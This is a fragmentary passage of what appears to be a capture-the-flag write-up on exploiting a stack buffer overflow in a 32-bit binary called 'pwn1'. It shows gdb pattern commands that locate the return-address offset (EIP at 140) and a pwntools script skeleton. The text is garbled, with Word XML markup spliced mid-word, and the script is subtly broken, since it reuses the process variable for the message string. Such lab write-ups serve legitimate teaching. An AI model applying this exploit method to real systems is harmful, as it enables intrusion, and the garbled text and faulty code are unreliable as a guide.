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#STEP 3: attack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take the control of the flow, we need to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the offset from the variable buffer and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returning address of the main function.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estimation could be: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base pointer (8x)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buffer (128x)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'junk' should be aroun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bytes, let</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">’s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check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with a debugger (gdb).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gdb pwn1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pattern create 200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pattern search 'patter with the error'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notice that we made a mistake, and that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x32 binary : the register are 4 bytes and not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bytes.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EIP+0 found at offset: 140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we need to interact with the process, we suggest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the following code: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pwn import *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= process('./pwn1')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 = 'here you message'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p.sendline(p)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p.interactive()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